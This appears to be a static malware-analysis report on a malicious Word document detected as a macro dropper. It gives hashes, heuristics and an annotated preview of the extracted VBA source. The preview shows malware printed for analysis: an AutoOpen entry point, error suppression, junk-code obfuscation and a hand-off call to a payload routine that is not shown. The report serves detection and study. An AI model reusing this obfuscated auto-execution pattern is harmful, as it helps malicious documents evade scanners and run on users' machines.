Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 18e87fa0349a8412…

MALICIOUS

Office (OLE)

172.5 KB Created: 2018-04-27 13:28:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 0d44ef83413013f363302dae793a7c96 SHA-1: af5ad94b91f4d3565bea8aae4477295aa262c499 SHA-256: 18e87fa0349a841292702fade67b2a2cf5b67f52f646ee12e09e4e34e38fc515
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 — Command and Scripting Interpreter: Visual Basic; T1204.002 — User Execution: Malicious File

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6520688-0. Critical heuristics indicate the presence of VBA macros with a Shell() call and an AutoOpen entry point (`Sub Autoopen` is visible in the extracted macros.bas below; the Shell() call itself is not within the previewed portion of the script and should be confirmed in the full 54 KB artifact). The VBA source is heavily obfuscated with junk code — repeated `Select Case` blocks keyed on variables that are never assigned, so their bodies never execute — and the only statement in `Autoopen` that does not fit this junk pattern is a call to `CtEiJlhrij(...)`, whose definition lies beyond the preview and is the likely hand-off to the real payload. Executing external commands from a macro is a common technique for downloading and running further stages of malware; no download URL or command line was recovered in the previewed portion, so second-stage attribution should wait on the full decoded source or dynamic analysis.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6520688-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6520688-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. Note that the generic wording of this heuristic ("no modern VBA project was recovered") does not apply to this sample: a VBA project was recovered (see the macros.bas artifact below, which contains `Sub Autoopen`), so this marker corroborates the AutoOpen finding above rather than standing as independent evidence. It is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard Office Open XML DrawingML namespace identifier, expected in any document carrying drawing/graphics metadata; it is not a network indicator and should not be treated as a C2 or payload URL.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 54190 bytes
SHA-256: 06371d1f77be79d8def50fdc3f39bb0f05820c7b453441e0ce538d5345d045f6
Preview script
First 1,000 lines of the extracted script
' Analyst note: module header of the extracted VBA project. VB_Base = "1Normal.ThisDocument"
' together with VB_PredeclaredId = True indicates this is the document's ThisDocument class
' module, i.e. the code is bound to the document itself rather than a standalone module.
' The module name is random-looking, consistent with the obfuscation seen in the procedures.
Attribute VB_Name = "RdQYzjkwruGrz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: junk/padding routine. The parameter awJKqG is never used, and the
' Select Case selector FJfMr is never assigned anywhere in this listing. If it is an
' undeclared Variant (Empty compares as 0), neither Case label matches and the body is
' dead code; the arithmetic inside reads only names that are likewise never assigned
' here. This shape repeats throughout the module to inflate and obfuscate the source.
Sub AzbzJT(awJKqG)
Select Case FJfMr
         Case 97446
            zWODGi = FHoAlA
            uftoin = Round(65794)
            VtUjS = Hex(BlwrAM - ChrW(cMtDk))
            VqVJE = aKilY
         Case 24792
            ' CByte(48418) is outside the Byte range (0-255) and would raise an
            ' overflow error if this branch ever ran - a further sign it is not meant to.
            CbBVj = CByte(48418)
            mEWrJ = Log(opSSAl)
End Select
End Sub
' Analyst note: junk/padding routine - three copies of the same dead Select Case
' template. The parameter siWzYi is unused, and the selectors JZbrJd, hUsLk and aRShEm
' are never assigned in this listing, so (as undeclared Variants) no Case label matches
' and nothing in the bodies executes. Nothing here contributes to the payload.
Sub ZNhzjP(siWzYi)
Select Case JZbrJd
         Case 41159
            QTdATQ = sMlnTl
            tBlUzX = Round(7505)
            XTfvfQ = Hex(aqHYww - ChrW(WjwLH))
            KNlLDT = ZGpjzY
         Case 66519
            ' CByte of a value > 255 would overflow if ever reached.
            KVXlUB = CByte(71755)
            fvpsjf = Log(XmQNX)
End Select
Select Case hUsLk
         Case 32463
            BaaYO = LOYam
            ZTFPOa = Round(98710)
            ERthKL = Hex(dAiZkk - ChrW(tEUQi))
            TnwMd = wqbEi
         Case 70591
            WPjhsN = CByte(5552)
            iNuACE = Log(aBvzw)
End Select
Select Case aRShEm
         Case 25172
            BwAowO = JXcDb
            lZELaU = Round(80163)
            aIjoA = Hex(wQzobp - ChrW(jQtLDq))
            QdSuU = prOVd
         Case 34915
            jaoUA = CByte(95874)
            CtXob = Log(BEILAX)
End Select
End Sub
' Analyst note: junk/padding routine - two copies of the dead Select Case template.
' FGCiK is unused; the selectors SCFcZ and vrYrkY are never assigned in this listing,
' so no Case label matches and the bodies never run. No payload logic here.
Sub izzplU(FGCiK)
Select Case SCFcZ
         Case 22205
            XFXFi = iwkjC
            Gophd = Round(96172)
            fzNvqt = Hex(STzzjm - ChrW(QHcbrL))
            mBVXz = EVdVc
         Case 58968
            fIJJjM = CByte(3486)
            OzlCQj = Log(jMFlmO)
End Select
Select Case vrYrkY
         Case 95622
            iXBvII = TufJTX
            kUjcP = Round(77143)
            Pqrbl = Hex(Slpbd - ChrW(XVOBU))
            hjtKG = vVtHDI
         Case 14443
            JaOhJ = CByte(37850)
            viiFD = Log(RzjWTO)
End Select
End Sub
' Analyst note: the auto-execution entry point. Word runs a procedure named AutoOpen
' (matched case-insensitively) when the document is opened; this is what the
' OLE_VBA_AUTOOPEN heuristic keys on.
Sub Autoopen()
' Suppresses every runtime error for the rest of the procedure, so neither the junk
' below nor a failure in the payload call surfaces an error dialog to the victim.
On Error Resume Next
' Dead Select Case template (selector iEXFj never assigned in this listing) - padding
' placed around the real call to break up signature matching.
Select Case iEXFj
         Case 27257
            QTLhhU = szHhr
            AmFLF = Round(4776)
            dWMlkt = Hex(aFDIz - ChrW(nGbTBY))
            LYCZpb = EwzLA
         Case 63847
            CtHZw = CByte(76641)
            tnuwj = Log(NtKlKh)
End Select
' The one statement that does not fit the junk pattern: a call into CtEiJlhrij, which
' is not defined within the previewed portion of macros.bas, with an argument built
' from three names never assigned in this listing (presumably populated elsewhere in
' the module). Treat this as the hand-off to the actual payload; the Shell() call
' reported by OLE_VBA_SHELL likely lives in or beneath CtEiJlhrij - confirm in the
' full artifact.
CtEiJlhrij (mFTmw + iPhOuWwc + jziGr)
' Trailing dead Select Case template (selector QfkMT never assigned here).
Select Case QfkMT
         Case 87906
            kRSlI = FfzLlN
            TOiza = Round(39589)
            nHUOjC = Hex(TQdjrr - ChrW(wBTTL))
            qdjmt = ppCAnm
         Case 98275
            RcwEE = CByte(10629)
            mOWitV = Log(WMKiPI)
End Select
End Sub
' Analyst note: junk/padding routine - three copies of the dead Select Case template.
' RQqtsb is unused; the selectors UEPOFZ, YFsXz and qjFmi are never assigned in this
' listing, so no Case label matches and the bodies never run. No payload logic here.
Sub JaiUnN(RQqtsb)
Select Case UEPOFZ
         Case 8985
            KHAXt = ppIXq
            HBOjQs = Round(72576)
            wjkBt = Hex(BIvPJ - ChrW(hvQaUQ))
            jcahW = wjSpf
         Case 94868
            ojQiW = CByte(97123)
            kRjusN = Log(vMloP)
End Select
Select Case YFsXz
         Case 27483
            vcjSPS = uwilEV
            jOvjoI = Round(90537)
            ThBQw = Hex(iqsfIw - ChrW(IiOiaR))
            zhzjt = oqzrK
         Case 11012
            sIBQz = CByte(42012)
            MHmGv = Log(EbjhB)
End Select
Select Case qjFmi
         Case 34196
            iAstA = Cupzj
            fELAqv = Round(86071)
            WKNKQq = Hex(PVnWTz - ChrW(nGTOlm))
            cObzjW = fjPqp
         Case 56881
            YmicKX = CByte(76014)
            BdNzC = Log(EjcJG)
End Select
End Sub
' Analyst note: junk/padding routine - one copy of the dead Select Case template.
' jmYfiV is unused; the selector OTklbP is never assigned in this listing, so neither
' Case label matches and the body never runs. No payload logic here.
Sub uvmKjU(jmYfiV)
Select Case OTklbP
         Case 10649
            MzlmT = aCnhii
            dAXwp = Round(67801)
            mdzjc = Hex(Clvqhr - ChrW(rjoYuB))
            Ijlwvn = lSNol
         Case 61175
            QjzCJ = CByte(86508)
            pGwzrs = Log(uMwBo)
End Select
End Sub

' Analyst note: start of a second module in the same VBA project (random-looking name,
' as above). Its first procedure, aAoWkI, opens with the same dead Select Case template;
' the preview is truncated shortly after, so the remainder of this module - including
' any definition of CtEiJlhrij or the reported Shell() call - must be read from the full
' macros.bas artifact.
Attribute VB_Name = "vCrznpCRSiCvL"
Sub aAoWkI(SdpwE)
Select Case JrGOmw
         Case 85894
            NrAPU = XXYuDf
            nuXcR = Round(62947)
            cZCAju = Hex(aLUPwS - ChrW(NIoGQS))
            vFvvYp = zjlVQ
   
... (truncated)